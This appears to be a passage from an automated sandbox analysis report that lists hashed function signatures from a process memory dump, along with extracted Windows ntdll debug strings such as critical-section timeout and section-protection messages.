            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2427cea116cf97ab25964171a80dfae812fa9137a691291182c88622be40c982
            • Instruction ID: 6701683ed14710fa320259735127c32efe139d5afcfd52a3b7ec47f02e60d19c
            • Opcode Fuzzy Hash: 2427cea116cf97ab25964171a80dfae812fa9137a691291182c88622be40c982
            • Instruction Fuzzy Hash: A190027121140442D2006169581470B000597D0343F51D021B1154555DC6658861B5B1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4741bb99e465c8fc92c9bf73d8a6baaf0161ac1601354822344458e9f605f2ce
            • Instruction ID: b30f15eb9f0da88696f42aaf7003100224571150e13d2cfae9b3460935fdaf02
            • Opcode Fuzzy Hash: 4741bb99e465c8fc92c9bf73d8a6baaf0161ac1601354822344458e9f605f2ce
            • Instruction Fuzzy Hash: 9790027121140442D20061695808747000597D0343F51D021B5154555EC6A5C8A1B571
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 27fe05028c4ca36f86e524aac8d021d84bcd97eb402f5f6ec26d3bc3a5ca2b22
            • Instruction ID: 8cd0c1340ef06e58be87b68b7ca70733bdaea9fe279cce7e6aab9b8b6689aedd
            • Opcode Fuzzy Hash: 27fe05028c4ca36f86e524aac8d021d84bcd97eb402f5f6ec26d3bc3a5ca2b22
            • Instruction Fuzzy Hash: 1B90026122180082D30065795C14B07000597D0343F51D125B0144554CC9558871A561
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9de8a8d3112d1e11ea477d11abfbdf41f5b66f722a3b32902895a99086e540c0
            • Instruction ID: 3ca9b87c567da8deca3e191ac896c65c3e861194dff2351daecd4b269f48eb60
            • Opcode Fuzzy Hash: 9de8a8d3112d1e11ea477d11abfbdf41f5b66f722a3b32902895a99086e540c0
            • Instruction Fuzzy Hash: 1790026125100842D240716994147070006D7D0742F51D021B0014554DC6568975B6F1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e221dec8810734be87c337c41cae2373cb67d76f5dedc83528ceabef4719d75b
            • Instruction ID: d5a649f90e2217b645b60e81489f0c9fa0dabcfd43bcf22c2c7f33de4fdfe7ec
            • Opcode Fuzzy Hash: e221dec8810734be87c337c41cae2373cb67d76f5dedc83528ceabef4719d75b
            • Instruction Fuzzy Hash: DF900271A15000529240716958146464006A7E0782F55D021B0504554CC9948A65A3E1
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f93c05ab3930df8011cc19e2ca6c597b0c9e0730e67325ecbeb6f2d00cc26278
            • Instruction ID: e53eeb4bad8babaa9b63d5785c5fc4a05f4eef394cd11a09c56404b36accd684
            • Opcode Fuzzy Hash: f93c05ab3930df8011cc19e2ca6c597b0c9e0730e67325ecbeb6f2d00cc26278
            • Instruction Fuzzy Hash: 2B90027132114442D21061699404706000597D1342F51D421B0814558DC6D588A1B162
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
            • Instruction ID: f8c46b5b903e7e891c1a59c77e2e55a87bea8a9ed6a1326f8c85d08c412e7983
            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: ___swprintf_l
            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
            • API String ID: 48624451-2108815105
            • Opcode ID: 3bdc1e842b8540c86782cee92ecbb86820db7ded6ac8e4206b2b6710f23806ef
            • Instruction ID: b85e128fd250ff274b36b7e2b1573038ac5ecf6ee9618440de7694df97b9d404
            • Opcode Fuzzy Hash: 3bdc1e842b8540c86782cee92ecbb86820db7ded6ac8e4206b2b6710f23806ef
            • Instruction Fuzzy Hash: 7A61D3B5A04156BBCB11DF998D80A7EF7B8FF48300B60826AF894D7681D374DE5097A2
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A405F1
            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A404BF
            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A40566
            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A4058F
            • ExecuteOptions, xrefs: 00A4050A
            • Execute=1, xrefs: 00A4057D
            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A405AC
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
            • API String ID: 0-484625025
            • Opcode ID: 372e9cb38d825702bc76321cd0886f4d8b21b8a1f6b1fdfce3e9e257109fafcb
            • Instruction ID: d94d2ad7d57da9499d7b033d26a97cf60c2807a332dc2e7cd82de0c4e53af79c
            • Opcode Fuzzy Hash: 372e9cb38d825702bc76321cd0886f4d8b21b8a1f6b1fdfce3e9e257109fafcb
            • Instruction Fuzzy Hash: 3F616E71A002597BDF11DBA5ED86FE977BCEFA4305F0400A9F609A7181DB709E818F61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A42953
            Strings
            • RTL: Re-Waiting, xrefs: 00A42988
            • RTL: Resource at %p, xrefs: 00A4296B
            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00A4295B
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
            • API String ID: 885266447-605551621
            • Opcode ID: 3279be35f955261c0afb2875bd96d32b983373f1f2d63b8ea39f4f76fa3a612e
            • Instruction ID: 0c8f74f7a6d7588daf778c7c43655cc710d568ea3ea8fbce2c335223b2db2614
            • Opcode Fuzzy Hash: 3279be35f955261c0afb2875bd96d32b983373f1f2d63b8ea39f4f76fa3a612e
            • Instruction Fuzzy Hash: 49318A35A00631BBCB218B26CC81F6BBB64EF95B20F504214FD486B682CB22FC11C7E1
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID:
            • String ID: $$@
            • API String ID: 0-1194432280
            • Opcode ID: a793c4c33d0ad93e1f56dc8ca3d4c9343542b272a6485ec793078018bf8b475b
            • Instruction ID: 186fcc552d92d4f2006eb955a8102846234c580f1cb3bc55275079a256477cb7
            • Opcode Fuzzy Hash: a793c4c33d0ad93e1f56dc8ca3d4c9343542b272a6485ec793078018bf8b475b
            • Instruction Fuzzy Hash: 08812671D00269DBDB31DF54DD45BEEB6B8AB09714F0141EAAA0DB7280E7309E85CFA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A7FDFA
            Strings
            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A7FE2B
            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A7FE01
            Memory Dump Source
            • Source File: 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp, Offset: 009C0000, based on PE: true
            Similarity
            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
            • API String ID: 885266447-3903918235
            • Opcode ID: 7e6ca2958345812976de64821de685f8295b1c022727ee24c9699d3948fe9db5
            • Instruction ID: b0b65e2aff501b94627cc11b22b82ebca0d5c5f5b16974e166a8aead0f794602
            • Opcode Fuzzy Hash: 7e6ca2958345812976de64821de685f8295b1c022727ee24c9699d3948fe9db5
            • Instruction Fuzzy Hash: AEF0F632640601BFDA241B55DD02F23BB6AEB84730F24C315F628565E1DAA2FD2096F4
            Uniqueness

            Uniqueness Score: -1.00%